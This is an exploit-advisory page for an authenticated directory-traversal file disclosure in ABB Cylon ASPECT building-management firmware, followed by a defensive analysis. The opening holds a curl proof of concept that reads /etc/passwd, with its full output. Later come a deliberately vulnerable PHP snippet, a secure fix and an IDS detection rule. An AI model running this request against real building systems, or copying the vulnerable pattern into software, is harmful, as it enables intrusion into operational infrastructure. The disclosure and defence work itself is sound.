ABB Cylon Aspect 3.07.02 - File Disclosure

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2025-04-03

# Exploit Title : ABB Cylon Aspect 3.07.02 - File Disclosure


Vendor: ABB Ltd.
Product web page: https://www.global.abb
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.07.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The building management system suffers from an authenticated arbitrary
file disclosure vulnerability. Input passed through the 'file' GET parameter
through the 'downloadDb.php' script is not properly verified before being used
to download database files. This can be exploited to disclose the contents of
arbitrary and sensitive files via directory traversal attacks.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5831
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5831.php


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

$ curl "http://192.168.73.31/downloadDb.php?file=../../../../../../../../etc/passwd" \
> -H "Cookie: PHPSESSID=xxx"
root:x:0:0:root:/home/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
messagebus:x:999:998::/var/lib/dbus:/bin/false
systemd-journal-gateway:x:998:995::/home/systemd-journal-gateway:
avahi:x:997:994::/var/run/avahi-daemon:/bin/false
avahi-autoipd:x:996:993:Avahi autoip daemon:/var/run/avahi-autoipd:/bin/false
sshd:x:995:992::/var/run/sshd:/bin/false
xuser:x:1000:1000::/home/xuser:
ppp:x:994:65534::/dev/null:/usr/sbin/ppp-dialin
mysql:x:993:65534::/var/mysql:
aamtech:x:500:500::/home/aamtech:/bin/sh

ABB Cylon Aspect 3.07.02 — Authenticated Arbitrary File Disclosure (Directory Traversal)

This article analyzes the authenticated arbitrary file disclosure vulnerability affecting ABB Cylon ASPECT firmware versions up to 3.07.02 (NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio). It explains the root cause, security impact, detection and remediation guidance, secure coding corrections, and operational hardening recommendations for building management systems (BMS).

Key facts

Vendor	ABB Ltd.
Product	ABB Cylon — ASPECT (NEXUS, MATRIX-2, ASPECT-Enterprise, ASPECT-Studio)
Affected firmware	≤ 3.07.02
Vulnerability	Authenticated arbitrary file disclosure via downloadDb.php 'file' parameter (directory traversal)
Advisory	ZSL-2024-5831 (discovered by Gjoko 'LiquidWorm' Krstic / zeroscience)
Date	21.04.2024

Summary of the issue

The ASPECT web application exposes a script (downloadDb.php) that accepts a 'file' GET parameter and returns file contents. Input was not validated or constrained to a safe directory, which makes the application vulnerable to directory traversal. An authenticated user can request files outside of the intended database path, potentially disclosing system files, configuration, credentials or other sensitive data stored on the host.

Why this is dangerous

Disclosure of configuration files (for example storing credentials or keys) can lead to credential theft and lateral movement.
System files (such as /etc/passwd, SSH keys, or application logs) can reveal user accounts, running services and attack vectors.
In an OT/ICS context, leaks of system or configuration data can enable targeted sabotage of building controls or privileged takeover.

Technical analysis

Typical vulnerable pattern (illustrative)

<?php
// vulnerable snippet (illustrative only)
$baseDir = '/opt/aspect/databases/';
$file = $_GET['file'];              // no validation
$path = $baseDir . $file;
if (file_exists($path)) {
    header('Content-Type: application/octet-stream');
    readfile($path);
}
?>

Explanation: This simplified snippet concatenates an attacker-controlled query parameter to a base directory and serves the file. Without validating or canonicalizing the path, sequences like "../" (directory traversal) allow access to files outside the intended directory.

Secure coding fix — canonicalization + whitelist

<?php
// safer approach: canonicalize and enforce an allow-list root
$baseDir = '/opt/aspect/databases/';

// get raw user input
$requested = isset($_GET['file']) ? $_GET['file'] : '';

// sanitize: remove NULL bytes and control characters
$requested = preg_replace('/[\\0-\\x1F]/', '', $requested);

// build an absolute path and canonicalize
$fullPath = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);

// ensure realpath succeeded and file is inside $baseDir
if ($fullPath === false || strpos($fullPath, realpath($baseDir)) !== 0) {
    http_response_code(400);
    echo 'Invalid file request';
    exit;
}

// further restrict acceptable files if possible (extension, name list)
$allowedExt = ['db', 'sqlite', 'bak'];
$ext = strtolower(pathinfo($fullPath, PATHINFO_EXTENSION));
if (!in_array($ext, $allowedExt, true)) {
    http_response_code(403);
    echo 'Not allowed';
    exit;
}

// safe to serve
header('Content-Type: application/octet-stream');
readfile($fullPath);
?>

Explanation: This corrected code canonicalizes the combined path with realpath(), then verifies the resolved path is within the intended base directory. It also enforces a whitelist of allowed extensions and strips control characters. These measures prevent directory traversal and reduce the chance of exposing unintended files.

Detection and monitoring

Log-based hunting

Search web server logs for requests to downloadDb.php and any query parameters containing ../ or URL-encoded equivalents (%2e%2e, %252e%252e): e.g., look for "downloadDb.php?file=" entries.
Alert on repeated 200 responses to file download endpoints from authenticated accounts that don't normally perform downloads.
Monitor for requests that return content types or patterns that do not match expected database files (for example, responses containing typical system file headers or textual content).

Example Suricata/Snort-style detection snippet (defensive)

# Example Suricata/IDS rule to flag suspicious traversal attempts to downloadDb.php
alert http any any -> $HOME_NET any (msg:"WEB-ATTACK Directory Traversal attempt to downloadDb.php"; flow:established,to_server; http.uri; pcre:"/downloadDb\.php\?file=.*(\.\.\/|%2e%2e|%252e%252e)/i"; sid:1000001; rev:1;)

Explanation: This sample IDS rule flags HTTP requests to downloadDb.php where the file parameter contains typical traversal sequences (raw or URL-encoded). Tune and test rules carefully to minimize false positives in production environments.

Mitigation and remediation

Apply vendor patches: check ABB support channels for firmware or application updates that address the issue and apply them as soon as possible.
If a patch is not available, restrict access to the management interface — place the device behind a firewall, VPN, or management network accessible only to authorized staff.
Disable or remove unused endpoints or scripts (for example, restrict or remove downloadDb.php) until a secure update is installed.
Harden authentication: enforce strong credentials, multi-factor authentication for remote access, rotate default passwords, and audit active sessions.
Implement network segmentation: isolate BMS/OT networks from corporate and Internet-facing networks, and use strict ACLs to limit which hosts can access management interfaces.
Implement integrity and confidentiality controls for sensitive files (least privilege for file permissions, encryption for stored secrets where feasible).

Incident response checklist (if you suspect exploitation)

Collect relevant logs (web server access logs, application logs, authentication events) and snapshot affected hosts for forensic analysis.
Identify the account(s) used to access the endpoint; disable compromised credentials and require rotation.
Search for unusual outbound connections or data exfiltration patterns from the BMS network.
Apply patches or temporary mitigations (network blocking, endpoint hardening) and coordinate with vendor support for root-cause remediation.
After containment, review and strengthen access controls, monitoring, and alerting to reduce recurrence risk.

Operational recommendations for building management systems

Adopt defense-in-depth: combine network segmentation, host hardening, robust authentication and continuous monitoring.
Restrict direct Internet access to BMS components; require remote maintenance via jump hosts or VPNs with strict logging.
Perform periodic security assessments and code reviews of web-facing components that handle file operations.
Keep inventories of firmware/software versions across deployed devices and maintain a patch management process for OT/ICS assets.

References and attribution

This vulnerability was publicly disclosed in Advisory ZSL-2024-5831 on 21.04.2024 and credited to Gjoko 'LiquidWorm' Krstic (@zeroscience). Affected product families include NEXUS, MATRIX-2, ASPECT-Enterprise and ASPECT-Studio running firmware up to 3.07.02.